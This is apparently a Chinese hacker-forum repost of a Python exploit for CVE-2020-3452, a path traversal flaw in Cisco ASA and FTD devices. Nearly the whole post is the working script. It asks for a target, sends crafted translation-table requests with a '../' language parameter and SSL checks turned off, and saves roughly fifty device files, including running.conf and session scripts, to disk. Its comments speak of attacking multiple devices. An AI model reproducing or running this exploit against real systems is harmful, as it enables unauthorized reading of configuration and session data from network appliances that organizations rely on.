跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: [email protected]
# Vendor Homepage: cisco.com
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github : https://github.com/cygenta/CVE-2020-3452

import requests

# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: CVE-2020-3452.py {target}"
# Example: CVE-2020-3452.py 192.168.0.12"
# Requires - Requests - pip3 install requests
#
# This tool takes advantage of the above cve and attempts to
# download files as listed below, it is suggested that you make
# a working folder for the outputfiles to avoid confusion if
# attacking mutliple ASA's

# set your target
target = input("Enter target IP/Url: ")


def grabstuff():
    for file in files:
        print("trying: ", file)

        #set request parameters
        params = (
            ('type', 'mst'),
            ('textdomain', '+CSCOE+/'+file),
            ('default-language', ''),
            ('lang', '../'),
        )

        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
        # write the file to the disk
        f = open(file,"w")
        f.write(response.text) 
        f.close()



# this is a list of files available to download, more will be added in time
# if anyone has a list of ASA files, I'd be happy to add here
files = {
"sess_update.html",
"blank.html",
"noportal.html",
"portal_ce.html",
"portal.html",
"logon_custom.css",
"svc.html",
"logo.gif",
"portal_inc.lua",
"nostcaccess.html",
"session.js",
"portal.js",
"portal_custom.css",
"running.conf",
"tlbrportal_forms.js",
"logon_forms.js",
"win.js",
"portal.css",
"lced.html",
"pluginlib.js",
"useralert.html",
"ping.html",
"app_index.html",
"shshimdo_url",
"session_password.html",
"relayjar.html",
"relayocx.html",
"color_picker.js",
"color_picker.html",
"cedhelp.html",
"cedmain.html",
"cedlogon.html",
"cedportal.html",
"portal_elements.html",
"commonspawn.js",
"common.js",
"appstart.js",
"relaymonjar.html",
"relaymonocx.html",
"cedsave.html",
"tunnel_linux.jnlp",
"ask.html",
"no_svc.html",
"preview.html",
"cedf.html",
"ced.html",
"logon_redirect.html",
"logout.html",
"tunnel_mac.jnlp",
"gp-gip.html",
"auth.html",
"wrong_url.html",
"logon.html"}


# obvious thing is obvious, try the things and barf if fail
try:
    grabstuff()
except Exception as err:
    print("Something went wrong sorry")
    print(err)

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。